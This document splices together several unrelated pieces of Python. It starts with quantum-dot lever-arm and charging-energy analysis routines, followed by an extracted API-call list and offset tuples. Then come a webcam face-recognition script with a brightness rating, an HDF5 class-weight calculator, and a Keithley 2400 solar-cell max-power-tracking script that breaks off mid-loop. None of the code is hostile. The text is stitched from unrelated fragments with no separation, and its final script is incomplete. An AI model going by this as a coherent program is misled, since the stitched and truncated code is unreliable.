qtt.pgeometry.plot2Dline(linePt3_horz, ':b', alpha=.4)
qtt.pgeometry.plot2Dline(linePt3_ints, ':b', alpha=.4)
qtt.pgeometry.plotPoints(intersect_point, '.b')
qtt.pgeometry.plotPoints(clicked_pts[:,2:3], '.b')
linePt3_ints_short = np.column_stack((intersect_point, clicked_pts[:,2:3]))
qtt.pgeometry.plotPoints(linePt3_ints_short, 'b')
def perpLineIntersect(ds, description, vertical = True, points=None):
""" Takes three points in a graph and calculates the length of a linepiece
between a line through points 1,2 and a vertical/horizontal line
through the third point. Uses the currently active figure.
Args:
ds (dataset): dataset with charge stability diagram and gate voltage in mV
vertical (bool): find intersection of point with line vertically (True)
or horizontally (False)
        description (str): analysis type, either 'lever_arm' or 'E_charging'
Returns:
        (dict): 'intersection_point' = intersection point
'distance' = length of line from 3rd clicked point to line
through clicked points 1 and 2
'clicked_points' = coordinates of the three clicked points
"""
diffDataset(ds, diff_dir='xy')
plt.figure(588); plt.clf()
MatPlot(ds.diff_dir_xy, num = 588)
ax = plt.gca()
ax.set_autoscale_on(False)
ax.set_xlabel(ax.get_xlabel()[:2])
ax.set_ylabel(ax.get_ylabel()[:2])
# ax = plt.gca()
# ax.set_autoscale_on(False)
if description == 'lever_arm' and vertical == True:
print('''Please click three points;
Point 1: on the addition line for the dot represented on the vertical axis
Point 2: further on the addition line for the dot represented on the vertical axis
Point 3: on the triple point at the addition line for the dot represented on the horizontal axis
where both dot levels are aligned''')
elif description == 'lever_arm' and vertical == False:
print('''Please click three points;
Point 1: on the addition line for the dot represented on the horizontal axis
Point 2: further on the addition line for the dot represented on the horizontal axis
Point 3: on the triple point at the addition line for the dot represented on the horizontal axis
where both dot levels are aligned''')
elif description == 'E_charging':
print('''Please click three points;
Point 1: on the (0, 1) - (0,2) addition line
Point 2: further on the (0, 1) - (0,2) addition line
Point 3: on the (0, 0) - (0, 1) addition line ''')
else:
# Do something here such that no three points need to be clicked
        print('''Please make sure that the description argument of this function
is either 'lever_arm' or 'E_charging' ''')
if points is not None:
clicked_pts = points
else:
clicked_pts=qtt.pgeometry.ginput(3, '.c')
qtt.pgeometry.plotPoints(clicked_pts, ':c')
qtt.pgeometry.plotLabels(clicked_pts)
linePoints1_2 = qtt.pgeometry.fitPlane( clicked_pts[:, 0:2].T )
yy = clicked_pts[:,[2, 2]]; yy[1, -1] += 1
line_vertical = qtt.pgeometry.fitPlane( yy.T )
xx = clicked_pts[:,[2, 2]]; xx[0, -1] += 1
line_horizontal = qtt.pgeometry.fitPlane( xx.T )
if vertical == True:
i = qtt.pgeometry.intersect2lines(linePoints1_2, line_vertical)
intersectPoint = qtt.pgeometry.dehom(i)
line = intersectPoint[:,[0,0]]; line[0,-1]+=1
else:
i = qtt.pgeometry.intersect2lines(linePoints1_2, line_horizontal)
intersectPoint = qtt.pgeometry.dehom(i)
line = intersectPoint[:,[0,0]]; line[1,-1]+=1
linePt3_ints = qtt.pgeometry.fitPlane(line.T)
line_length = np.linalg.norm(intersectPoint - clicked_pts[:,2:3])
# visualize
plotAnalysedLines(clicked_pts, linePoints1_2, line_vertical, line_horizontal, linePt3_ints, intersectPoint)
return {'intersection_point': intersectPoint, 'distance': line_length, 'clicked_points': clicked_pts}
#def intersect2lines(l1, l2):
#    """ Calculate intersection between 2 lines """
# r = qtt.pgeometry.null(np.vstack( (l1, l2)) )
# a = qtt.pgeometry.dehom(r[1])
# return a
def lever_arm(bias, results, fig = None):
""" Calculates the lever arm of a dot by using bias triangles in charge sensing. Uses currently active figure.
Args:
bias (float): bias in uV between source and drain while taking the bias triangles
results (dict): dictionary returned from the function perpLineIntersect
containing three points, the intersection point
between a line through 1,2 and the third point and the
length from points 3 to the intersection (horz/vert)
fig (bool): adds lever arm to title of already existing figure with points
Returns:
lev_arm (float): the lever arm of the assigned dot in uV/mV
"""
line_length = results['distance']
#in uV/mV
lev_arm = abs(bias/line_length)
if fig and len(plt.get_fignums()) != 0:
ax = plt.gca()
ax.set_autoscale_on(False)
if np.round(results['clicked_points'][0,2],2) == np.round(results['intersection_point'][0],2):
gate = ax.get_ylabel()[:2]
else:
gate = ax.get_xlabel()[:2]
        title = r'Lever arm %s: %.2f $\mu$eV/mV' % (gate, lev_arm)
plt.annotate('Length %s: %.2f mV'%(gate, line_length), xy = (0.05, 0.1), xycoords='axes fraction', color = 'k')
plt.annotate(title, xy = (0.05, 0.05), xycoords='axes fraction', color = 'k')
ax.set_title(title)
return lev_arm
def E_charging(lev_arm, results, fig = None):
"""
Calculates the charging energy of a dot by using charge stability diagrams.
Uses currently active figure.
Args:
lev_arm (float): lever arm for the gate to the dot
results (dict): dictionary returned from the function perpLineIntersect
containing three points, the intersection point
between a line through 1,2 and the third point and the
length from points 3 to the intersection (horz/vert)
fig (bool): adds charging energy to title of already existing figure with points
Returns:
E_charging (float): the charging energy for the dot
"""
line_length = results['distance']
E_c = line_length * lev_arm
if fig and len(plt.get_fignums()) != 0:
ax = plt.gca()
ax.set_autoscale_on(False)
if np.round(results['clicked_points'][0,2],2) == np.round(results['intersection_point'][0],2):
gate = ax.get_ylabel()[:2]
else:
gate = ax.get_xlabel()[:2]
title = 'E_charging %s: %.2f meV'%(gate, E_c/1000)
plt.annotate('Length %s: %.2f mV'%(gate, line_length), xy = (0.05, 0.1), xycoords='axes fraction', color = 'k')
plt.annotate(title, xy = (0.05, 0.05), xycoords='axes fraction', color = 'k')
ax.set_title(title)
return E_c
def test_lever_arm():
lever_arm_fit = {'clicked_points': np.array([[ 24., 38., 40.], [135., 128., 111.]]), 'distance': 15., 'intersection_point': np.array([[ 40.4],[127.]])}
r=lever_arm(-800, lever_arm_fit)
assert(np.abs(r-53.3)<1e-1)
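# Illustrative workflow (a sketch under assumptions, not part of the original module):
# the analysis chains perpLineIntersect -> lever_arm -> E_charging. `dataset` is a
# hypothetical qcodes dataset containing a charge stability diagram; the bias (in uV)
# must match the actual measurement.
#
#   results_la = perpLineIntersect(dataset, 'lever_arm', vertical=True)
#   alpha = lever_arm(-800, results_la, fig=True)          # lever arm in ueV/mV
#   results_ec = perpLineIntersect(dataset, 'E_charging', vertical=True)
#   E_c = E_charging(alpha, results_ec, fig=True)          # charging energy in ueV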
|
[
"numpy.abs",
"matplotlib.pyplot.clf",
"matplotlib.pyplot.figure",
"numpy.linalg.norm",
"matplotlib.pyplot.gca",
"numpy.round",
"qtt.pgeometry.intersect2lines",
"qtt.pgeometry.plot2Dline",
"qtt.pgeometry.dehom",
"qtt.pgeometry.fitPlane",
"qtt.data.diffDataset",
"matplotlib.pyplot.get_fignums",
"qtt.pgeometry.plotLabels",
"qcodes.plots.qcmatplotlib.MatPlot",
"matplotlib.pyplot.annotate",
"qtt.pgeometry.ginput",
"numpy.array",
"numpy.column_stack",
"qtt.pgeometry.plotPoints"
] |
[((918, 974), 'qtt.pgeometry.plot2Dline', 'qtt.pgeometry.plot2Dline', (['linePoints1_2', '""":c"""'], {'alpha': '(0.5)'}), "(linePoints1_2, ':c', alpha=0.5)\n", (942, 974), False, 'import qtt\n'), ((980, 1035), 'qtt.pgeometry.plot2Dline', 'qtt.pgeometry.plot2Dline', (['linePt3_vert', '""":b"""'], {'alpha': '(0.4)'}), "(linePt3_vert, ':b', alpha=0.4)\n", (1004, 1035), False, 'import qtt\n'), ((1039, 1094), 'qtt.pgeometry.plot2Dline', 'qtt.pgeometry.plot2Dline', (['linePt3_horz', '""":b"""'], {'alpha': '(0.4)'}), "(linePt3_horz, ':b', alpha=0.4)\n", (1063, 1094), False, 'import qtt\n'), ((1098, 1153), 'qtt.pgeometry.plot2Dline', 'qtt.pgeometry.plot2Dline', (['linePt3_ints', '""":b"""'], {'alpha': '(0.4)'}), "(linePt3_ints, ':b', alpha=0.4)\n", (1122, 1153), False, 'import qtt\n'), ((1162, 1209), 'qtt.pgeometry.plotPoints', 'qtt.pgeometry.plotPoints', (['intersect_point', '""".b"""'], {}), "(intersect_point, '.b')\n", (1186, 1209), False, 'import qtt\n'), ((1214, 1265), 'qtt.pgeometry.plotPoints', 'qtt.pgeometry.plotPoints', (['clicked_pts[:, 2:3]', '""".b"""'], {}), "(clicked_pts[:, 2:3], '.b')\n", (1238, 1265), False, 'import qtt\n'), ((1295, 1350), 'numpy.column_stack', 'np.column_stack', (['(intersect_point, clicked_pts[:, 2:3])'], {}), '((intersect_point, clicked_pts[:, 2:3]))\n', (1310, 1350), True, 'import numpy as np\n'), ((1354, 1403), 'qtt.pgeometry.plotPoints', 'qtt.pgeometry.plotPoints', (['linePt3_ints_short', '"""b"""'], {}), "(linePt3_ints_short, 'b')\n", (1378, 1403), False, 'import qtt\n'), ((2271, 2301), 'qtt.data.diffDataset', 'diffDataset', (['ds'], {'diff_dir': '"""xy"""'}), "(ds, diff_dir='xy')\n", (2282, 2301), False, 'from qtt.data import diffDataset\n'), ((2306, 2321), 'matplotlib.pyplot.figure', 'plt.figure', (['(588)'], {}), '(588)\n', (2316, 2321), True, 'import matplotlib.pyplot as plt\n'), ((2323, 2332), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (2330, 2332), True, 'import matplotlib.pyplot as plt\n'), ((2337, 2369), 'qcodes.plots.qcmatplotlib.MatPlot', 'MatPlot', (['ds.diff_dir_xy'], {'num': '(588)'}), '(ds.diff_dir_xy, num=588)\n', (2344, 2369), False, 'from qcodes.plots.qcmatplotlib import MatPlot\n'), ((2381, 2390), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (2388, 2390), True, 'import matplotlib.pyplot as plt\n'), ((4064, 4107), 'qtt.pgeometry.plotPoints', 'qtt.pgeometry.plotPoints', (['clicked_pts', '""":c"""'], {}), "(clicked_pts, ':c')\n", (4088, 4107), False, 'import qtt\n'), ((4112, 4149), 'qtt.pgeometry.plotLabels', 'qtt.pgeometry.plotLabels', (['clicked_pts'], {}), '(clicked_pts)\n', (4136, 4149), False, 'import qtt\n'), ((4175, 4220), 'qtt.pgeometry.fitPlane', 'qtt.pgeometry.fitPlane', (['clicked_pts[:, 0:2].T'], {}), '(clicked_pts[:, 0:2].T)\n', (4197, 4220), False, 'import qtt\n'), ((4295, 4323), 'qtt.pgeometry.fitPlane', 'qtt.pgeometry.fitPlane', (['yy.T'], {}), '(yy.T)\n', (4317, 4323), False, 'import qtt\n'), ((4396, 4424), 'qtt.pgeometry.fitPlane', 'qtt.pgeometry.fitPlane', (['xx.T'], {}), '(xx.T)\n', (4418, 4424), False, 'import qtt\n'), ((4845, 4875), 'qtt.pgeometry.fitPlane', 'qtt.pgeometry.fitPlane', (['line.T'], {}), '(line.T)\n', (4867, 4875), False, 'import qtt\n'), ((4894, 4946), 'numpy.linalg.norm', 'np.linalg.norm', (['(intersectPoint - clicked_pts[:, 2:3])'], {}), '(intersectPoint - clicked_pts[:, 2:3])\n', (4908, 4946), True, 'import numpy as np\n'), ((4025, 4054), 'qtt.pgeometry.ginput', 'qtt.pgeometry.ginput', (['(3)', '""".c"""'], {}), "(3, '.c')\n", (4045, 4054), False, 'import qtt\n'), ((4473, 4532), 
'qtt.pgeometry.intersect2lines', 'qtt.pgeometry.intersect2lines', (['linePoints1_2', 'line_vertical'], {}), '(linePoints1_2, line_vertical)\n', (4502, 4532), False, 'import qtt\n'), ((4558, 4580), 'qtt.pgeometry.dehom', 'qtt.pgeometry.dehom', (['i'], {}), '(i)\n', (4577, 4580), False, 'import qtt\n'), ((4657, 4718), 'qtt.pgeometry.intersect2lines', 'qtt.pgeometry.intersect2lines', (['linePoints1_2', 'line_horizontal'], {}), '(linePoints1_2, line_horizontal)\n', (4686, 4718), False, 'import qtt\n'), ((4744, 4766), 'qtt.pgeometry.dehom', 'qtt.pgeometry.dehom', (['i'], {}), '(i)\n', (4763, 4766), False, 'import qtt\n'), ((6280, 6289), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (6287, 6289), True, 'import matplotlib.pyplot as plt\n'), ((6594, 6707), 'matplotlib.pyplot.annotate', 'plt.annotate', (["('Length %s: %.2f mV' % (gate, line_length))"], {'xy': '(0.05, 0.1)', 'xycoords': '"""axes fraction"""', 'color': '"""k"""'}), "('Length %s: %.2f mV' % (gate, line_length), xy=(0.05, 0.1),\n xycoords='axes fraction', color='k')\n", (6606, 6707), True, 'import matplotlib.pyplot as plt\n'), ((6714, 6787), 'matplotlib.pyplot.annotate', 'plt.annotate', (['title'], {'xy': '(0.05, 0.05)', 'xycoords': '"""axes fraction"""', 'color': '"""k"""'}), "(title, xy=(0.05, 0.05), xycoords='axes fraction', color='k')\n", (6726, 6787), True, 'import matplotlib.pyplot as plt\n'), ((7711, 7720), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (7718, 7720), True, 'import matplotlib.pyplot as plt\n'), ((8018, 8132), 'matplotlib.pyplot.annotate', 'plt.annotate', (["('Length %s: %.2f mV' % (gate, line_length))"], {'xy': '(0.05, 0.1)', 'xycoords': '"""axes fraction"""', 'color': '"""k"""'}), "('Length %s: %.2f mV' % (gate, line_length), xy=(0.05, 0.1),\n xycoords='axes fraction', color='k')\n", (8030, 8132), True, 'import matplotlib.pyplot as plt\n'), ((8139, 8212), 'matplotlib.pyplot.annotate', 'plt.annotate', (['title'], {'xy': '(0.05, 0.05)', 'xycoords': '"""axes fraction"""', 'color': '"""k"""'}), "(title, xy=(0.05, 0.05), xycoords='axes fraction', color='k')\n", (8151, 8212), True, 'import matplotlib.pyplot as plt\n'), ((8331, 8384), 'numpy.array', 'np.array', (['[[24.0, 38.0, 40.0], [135.0, 128.0, 111.0]]'], {}), '([[24.0, 38.0, 40.0], [135.0, 128.0, 111.0]])\n', (8339, 8384), True, 'import numpy as np\n'), ((8422, 8449), 'numpy.array', 'np.array', (['[[40.4], [127.0]]'], {}), '([[40.4], [127.0]])\n', (8430, 8449), True, 'import numpy as np\n'), ((8499, 8515), 'numpy.abs', 'np.abs', (['(r - 53.3)'], {}), '(r - 53.3)\n', (8505, 8515), True, 'import numpy as np\n'), ((6336, 6380), 'numpy.round', 'np.round', (["results['clicked_points'][0, 2]", '(2)'], {}), "(results['clicked_points'][0, 2], 2)\n", (6344, 6380), True, 'import numpy as np\n'), ((6382, 6427), 'numpy.round', 'np.round', (["results['intersection_point'][0]", '(2)'], {}), "(results['intersection_point'][0], 2)\n", (6390, 6427), True, 'import numpy as np\n'), ((7767, 7811), 'numpy.round', 'np.round', (["results['clicked_points'][0, 2]", '(2)'], {}), "(results['clicked_points'][0, 2], 2)\n", (7775, 7811), True, 'import numpy as np\n'), ((7813, 7858), 'numpy.round', 'np.round', (["results['intersection_point'][0]", '(2)'], {}), "(results['intersection_point'][0], 2)\n", (7821, 7858), True, 'import numpy as np\n'), ((6242, 6259), 'matplotlib.pyplot.get_fignums', 'plt.get_fignums', ([], {}), '()\n', (6257, 6259), True, 'import matplotlib.pyplot as plt\n'), ((7673, 7690), 'matplotlib.pyplot.get_fignums', 'plt.get_fignums', ([], {}), '()\n', (7688, 
7690), True, 'import matplotlib.pyplot as plt\n')]
|
import face_recognition
import cv2
import numpy as np
import os
import re
from itertools import chain
known_people_folder='./database'
def scan_known_people(known_people_folder):
known_names = []
known_face_encodings = []
for file in image_files_in_folder(known_people_folder):
basename = os.path.splitext(os.path.basename(file))[0]
img = face_recognition.load_image_file(file)
encodings = face_recognition.face_encodings(img)
print('in face finding function')
if len(encodings) > 1:
            print("WARNING: More than one face found in {}. Only considering the first face.".format(file))
if len(encodings) == 0:
            print("WARNING: No faces found in {}. Ignoring file.".format(file))
else:
known_names.append(basename)
known_face_encodings.append(encodings[0])
    return known_names, known_face_encodings
def image_files_in_folder(folder):
    print('in image files in folder function')
return [os.path.join(folder, f) for f in os.listdir(folder) if re.match(r'.*\.(jpg|jpeg|png)', f, flags=re.I)]
#improved:-
# 1. Process each video frame at 1/4 resolution (though still display it at full resolution)
# 2. Only detect faces in every other frame of video.
#There you go, i pulled a little sneaky on you.
known_people_folder='./database'
# Get a reference to webcam #0 (the default one)
video_capture = cv2.VideoCapture(0)
# Create arrays of known face encodings and their names
known_face_names,known_face_encodings = scan_known_people(known_people_folder)
# Initialize some variables
face_locations = []
face_encodings = []
face_names = []
process_this_frame = True
while True:
# Grab a single frame of video
ret, frame = video_capture.read()
    # Convert the image to HLS for brightness (light intensity) detection
imgHLS = cv2.cvtColor(frame, cv2.COLOR_BGR2HLS)
Lchannel = imgHLS[:,:,1]
a=list(chain.from_iterable(Lchannel))
brightness=sum(a)/len(a)
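    # 'brightness' is the mean HLS lightness (0-255) over the frame; the thresholds
    # below bucket it into a rough visibility rating shown in the video overlay.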
if(brightness<=75):
condition="Very Poor"
if(brightness<=85 and brightness >75):
        condition="Poor"
    if(brightness<=95 and brightness >85):
        condition="Good"
    if(brightness <=105 and brightness >95):
        condition="Very Good"
if(brightness >105):
condition="Excellent"
print(condition)
#print(brightness)
#np.array(Lchannel).tolist()
#print(type(Lchannel))
# Resize frame of video to 1/4 size for faster face recognition processing
small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)
# Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)
rgb_small_frame = small_frame[:, :, ::-1]
# Only process every other frame of video to save time
if process_this_frame:
# Find all the faces and face encodings in the current frame of video
face_locations = face_recognition.face_locations(rgb_small_frame)
face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
face_names = []
for face_encoding in face_encodings:
# See if the face is a match for the known face(s)
matches = face_recognition.compare_faces(known_face_encodings, face_encoding)
name = "Unknown"
# # If a match was found in known_face_encodings, just use the first one.
# if True in matches:
# first_match_index = matches.index(True)
# name = known_face_names[first_match_index]
# Or instead, use the known face with the smallest distance to the new face
face_distances = face_recognition.face_distance(known_face_encodings, face_encoding)
best_match_index = np.argmin(face_distances)
if matches[best_match_index]:
name = known_face_names[best_match_index]
face_names.append(name)
process_this_frame = not process_this_frame
# Display the results
for (top, right, bottom, left), name in zip(face_locations, face_names):
# Scale back up face locations since the frame we detected in was scaled to 1/4 size
top *= 4
right *= 4
bottom *= 4
left *= 4
# Draw a box around the face
cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)
# Draw a label with a name below the face
cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)
    cv2.putText(frame,'Brightness/Visibility: '+condition,(80,30), font,1,(255,255,255),1,cv2.LINE_AA)
cv2.putText(frame,'Press Q to Quit',(5,470), font,0.5,(255,255,255),1,cv2.LINE_AA)
# Display the resulting image
cv2.imshow('Video', frame)
# Hit 'q' on the keyboard to quit!
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# Release handle to the webcam
video_capture.release()
cv2.destroyAllWindows()
|
[
"face_recognition.compare_faces",
"numpy.argmin",
"cv2.rectangle",
"cv2.imshow",
"os.path.join",
"cv2.cvtColor",
"face_recognition.face_encodings",
"cv2.destroyAllWindows",
"cv2.resize",
"face_recognition.face_distance",
"os.path.basename",
"cv2.waitKey",
"re.match",
"os.listdir",
"cv2.putText",
"cv2.VideoCapture",
"face_recognition.face_locations",
"face_recognition.load_image_file",
"itertools.chain.from_iterable"
] |
[((1610, 1629), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (1626, 1629), False, 'import cv2\n'), ((5245, 5268), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (5266, 5268), False, 'import cv2\n'), ((2053, 2091), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2HLS'], {}), '(frame, cv2.COLOR_BGR2HLS)\n', (2065, 2091), False, 'import cv2\n'), ((2732, 2775), 'cv2.resize', 'cv2.resize', (['frame', '(0, 0)'], {'fx': '(0.25)', 'fy': '(0.25)'}), '(frame, (0, 0), fx=0.25, fy=0.25)\n', (2742, 2775), False, 'import cv2\n'), ((5066, 5092), 'cv2.imshow', 'cv2.imshow', (['"""Video"""', 'frame'], {}), "('Video', frame)\n", (5076, 5092), False, 'import cv2\n'), ((370, 408), 'face_recognition.load_image_file', 'face_recognition.load_image_file', (['file'], {}), '(file)\n', (402, 408), False, 'import face_recognition\n'), ((429, 465), 'face_recognition.face_encodings', 'face_recognition.face_encodings', (['img'], {}), '(img)\n', (460, 465), False, 'import face_recognition\n'), ((1193, 1216), 'os.path.join', 'os.path.join', (['folder', 'f'], {}), '(folder, f)\n', (1205, 1216), False, 'import os\n'), ((2137, 2166), 'itertools.chain.from_iterable', 'chain.from_iterable', (['Lchannel'], {}), '(Lchannel)\n', (2156, 2166), False, 'from itertools import chain\n'), ((3115, 3163), 'face_recognition.face_locations', 'face_recognition.face_locations', (['rgb_small_frame'], {}), '(rgb_small_frame)\n', (3146, 3163), False, 'import face_recognition\n'), ((3189, 3253), 'face_recognition.face_encodings', 'face_recognition.face_encodings', (['rgb_small_frame', 'face_locations'], {}), '(rgb_small_frame, face_locations)\n', (3220, 3253), False, 'import face_recognition\n'), ((4493, 4559), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(left, top)', '(right, bottom)', '(0, 0, 255)', '(2)'], {}), '(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n', (4506, 4559), False, 'import cv2\n'), ((4619, 4707), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(left, bottom - 35)', '(right, bottom)', '(0, 0, 255)', 'cv2.FILLED'], {}), '(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2\n .FILLED)\n', (4632, 4707), False, 'import cv2\n'), ((4750, 4829), 'cv2.putText', 'cv2.putText', (['frame', 'name', '(left + 6, bottom - 6)', 'font', '(1.0)', '(255, 255, 255)', '(1)'], {}), '(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)\n', (4761, 4829), False, 'import cv2\n'), ((4838, 4950), 'cv2.putText', 'cv2.putText', (['frame', "('Brightness/Visiblity: ' + condition)", '(80, 30)', 'font', '(1)', '(255, 255, 255)', '(1)', 'cv2.LINE_AA'], {}), "(frame, 'Brightness/Visiblity: ' + condition, (80, 30), font, 1,\n (255, 255, 255), 1, cv2.LINE_AA)\n", (4849, 4950), False, 'import cv2\n'), ((4944, 5039), 'cv2.putText', 'cv2.putText', (['frame', '"""Press Q to Quit"""', '(5, 470)', 'font', '(0.5)', '(255, 255, 255)', '(1)', 'cv2.LINE_AA'], {}), "(frame, 'Press Q to Quit', (5, 470), font, 0.5, (255, 255, 255),\n 1, cv2.LINE_AA)\n", (4955, 5039), False, 'import cv2\n'), ((1226, 1244), 'os.listdir', 'os.listdir', (['folder'], {}), '(folder)\n', (1236, 1244), False, 'import os\n'), ((1248, 1294), 're.match', 're.match', (['""".*\\\\.(jpg|jpeg|png)"""', 'f'], {'flags': 're.I'}), "('.*\\\\.(jpg|jpeg|png)', f, flags=re.I)\n", (1256, 1294), False, 'import re\n'), ((3409, 3476), 'face_recognition.compare_faces', 'face_recognition.compare_faces', (['known_face_encodings', 'face_encoding'], {}), '(known_face_encodings, face_encoding)\n', (3439, 3476), False, 'import 
face_recognition\n'), ((3864, 3931), 'face_recognition.face_distance', 'face_recognition.face_distance', (['known_face_encodings', 'face_encoding'], {}), '(known_face_encodings, face_encoding)\n', (3894, 3931), False, 'import face_recognition\n'), ((3963, 3988), 'numpy.argmin', 'np.argmin', (['face_distances'], {}), '(face_distances)\n', (3972, 3988), True, 'import numpy as np\n'), ((5140, 5154), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (5151, 5154), False, 'import cv2\n'), ((329, 351), 'os.path.basename', 'os.path.basename', (['file'], {}), '(file)\n', (345, 351), False, 'import os\n')]
|
import os
import sys
import h5py
import argparse
import numpy as np
parser = argparse.ArgumentParser()
parser.add_argument('--root', help='path to root directory')
args = parser.parse_args()
root = args.root
fname = os.path.join(root, 'metadata/train.txt')
flist = [os.path.join(root, 'h5', line.strip())
for line in open(fname, 'r')]
fname = os.path.join(root, 'metadata', 'classes.txt')
classes = [line.strip() for line in open(fname, 'r')]
num_classes = len(classes)
sizes = np.zeros(num_classes)
total = np.zeros(num_classes)
for fname in flist:
print('> Processing {}...'.format(fname))
    fin = h5py.File(fname, 'r')
coords = fin['coords'][:]
points = fin['points'][:]
labels = fin['labels'][:]
labels = labels.reshape(-1, 2)
num_points = labels.shape[0]
for i in range(num_classes):
indices = (labels[:, 0] == i)
size = np.sum(indices)
sizes[i] += size
if size == 0: continue
total[i] += num_points
freq = sizes / total
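# Median-frequency balancing: classes rarer than the median class frequency get
# weights > 1, more frequent classes get weights < 1.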
weight = np.median(freq) / freq
fname = os.path.join(root, 'metadata', 'weight.txt')
print('> Saving statistics to {}...'.format(fname))
np.savetxt(fname, weight, fmt='%f')
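# Example invocation (hypothetical script name and path; the only argument is --root):
#   python compute_weights.py --root /path/to/dataset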
|
[
"h5py.File",
"numpy.sum",
"argparse.ArgumentParser",
"numpy.median",
"numpy.savetxt",
"numpy.zeros",
"os.path.join"
] |
[((79, 104), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (102, 104), False, 'import argparse\n'), ((220, 260), 'os.path.join', 'os.path.join', (['root', '"""metadata/train.txt"""'], {}), "(root, 'metadata/train.txt')\n", (232, 260), False, 'import os\n'), ((357, 402), 'os.path.join', 'os.path.join', (['root', '"""metadata"""', '"""classes.txt"""'], {}), "(root, 'metadata', 'classes.txt')\n", (369, 402), False, 'import os\n'), ((492, 513), 'numpy.zeros', 'np.zeros', (['num_classes'], {}), '(num_classes)\n', (500, 513), True, 'import numpy as np\n'), ((522, 543), 'numpy.zeros', 'np.zeros', (['num_classes'], {}), '(num_classes)\n', (530, 543), True, 'import numpy as np\n'), ((1049, 1093), 'os.path.join', 'os.path.join', (['root', '"""metadata"""', '"""weight.txt"""'], {}), "(root, 'metadata', 'weight.txt')\n", (1061, 1093), False, 'import os\n'), ((1146, 1181), 'numpy.savetxt', 'np.savetxt', (['fname', 'weight'], {'fmt': '"""%f"""'}), "(fname, weight, fmt='%f')\n", (1156, 1181), True, 'import numpy as np\n'), ((621, 637), 'h5py.File', 'h5py.File', (['fname'], {}), '(fname)\n', (630, 637), False, 'import h5py\n'), ((1017, 1032), 'numpy.median', 'np.median', (['freq'], {}), '(freq)\n', (1026, 1032), True, 'import numpy as np\n'), ((883, 898), 'numpy.sum', 'np.sum', (['indices'], {}), '(indices)\n', (889, 898), True, 'import numpy as np\n')]
|
import argparse
import time
import numpy as np
import pyvisa
# Parse folder path, file name, and measurement parameters from command line
# arguments. Remember to include the "python" keyword before the call to the
# python file from the command line, e.g. python example.py "arg1" "arg2".
# Folder paths must use forward slashes to separate subfolders.
parser = argparse.ArgumentParser(
description='Measure and save max power point tracking data')
parser.add_argument(
'folder_path',
metavar='folder_path',
type=str,
help='Absolute path to the folder containing max P stabilisation data')
parser.add_argument(
'file_name',
metavar='file_name',
type=str,
help='Name of the file to save the data to')
parser.add_argument(
'V_start',
metavar='V_start',
type=float,
help='Seed voltage for maximum power point tracker (V)')
parser.add_argument(
'nplc',
metavar='nplc',
type=float,
help='Integration filter in number of power line cycles (NPLC)')
parser.add_argument(
't_settling', metavar='t_settling', type=float, help='Settling delay (ms)')
parser.add_argument(
't_track',
metavar='t_track',
type=float,
help='Time to track maximum power point for (s)')
parser.add_argument('A', metavar='A', type=float, help='Device area (cm^2)')
parser.add_argument(
'num_of_suns',
metavar='num_of_suns',
type=float,
help='Number of suns equivalent illumination intensity')
args = parser.parse_args()
# Assign argparse arguments to variables
folderpath = args.folder_path
filename = args.file_name
V_start = args.V_start
A = args.A
nplc = args.nplc
t_settling = args.t_settling
t_track = args.t_track
suns = args.num_of_suns
V_range = np.absolute(V_start)
# Set current measurement range to 10 times SQ limit for 0.5 eV
# bandgap for the given area
I_range = 10 * 0.065 * A
# Assign the VISA resource to a variable
rm = pyvisa.ResourceManager()
keithley2400 = rm.open_resource('GPIfdf8:f53e:61e4::18::INSTR')
keithley2400.query('*IDN?')
keithley2400.write('*RST')
keithley2400.encoding = 'latin-1'
# Disable the output
keithley2400.write('OUTP OFF')
# Enable 4-wire sense
keithley2400.write(':SYST:RSEN 1')
# Don't auto-off source after measurement
keithley2400.write(':SOUR:CLE:AUTO OFF')
# Set source mode to voltage
keithley2400.write(':SOUR:FUNC VOLT')
# Set output-off mode to high impedance
keithley2400.write(':OUTP:SMOD HIMP')
# Set the voltage range
keithley2400.write(':SOUR:VOLT:RANG {}'.format(V_range))
# Set the current range
keithley2400.write(':SOUR:CURR:RANG {}'.format(I_range))
# Set the delay
keithley2400.write(':SOUR:DEL {}'.format(t_settling))
# Set the integration filter
keithley2400.write(':SENS:CURR:NPLC {}'.format(nplc))
# Disable autozero
keithley2400.write(':SYST:AZER OFF')
def track_max_power(V, t_track):
"""Maximum power point stabilizer.
Holding at a fixed voltage (V), measure the power output for a fixed
amount of time (t_track), taking as many measurements as possible.
Parameters
----------
V : float
Seed voltage for the maximum power point tracker (V)
t_track : float
Time to track the maximum power point for (s)
Returns
-------
    ts : list of float
        Elapsed times since the start of tracking (s)
    Vs : list of float
        Voltages (V)
    Is : list of float
        Currents (A)
    Js : list of float
        Current densities (mA / cm^2)
    Ps : list of float
        Powers (W)
    PCEs : list of float
        Power conversion efficiencies (%)
"""
# Initialise empty lists for storing data
ts = []
Vs = []
Is = []
Js = []
Ps = []
PCEs = []
    # Turn on the Keithley output at the seed voltage and measure in the dark for ~3 s
keithley2400.write(':SOUR:VOLT {}'.format(V))
keithley2400.write('OUTP ON')
# Start timing
t_start = time.time()
t = time.time()
# Measure Jsc in the dark for 3s
while t - t_start < 3:
ts.append(t - t_start)
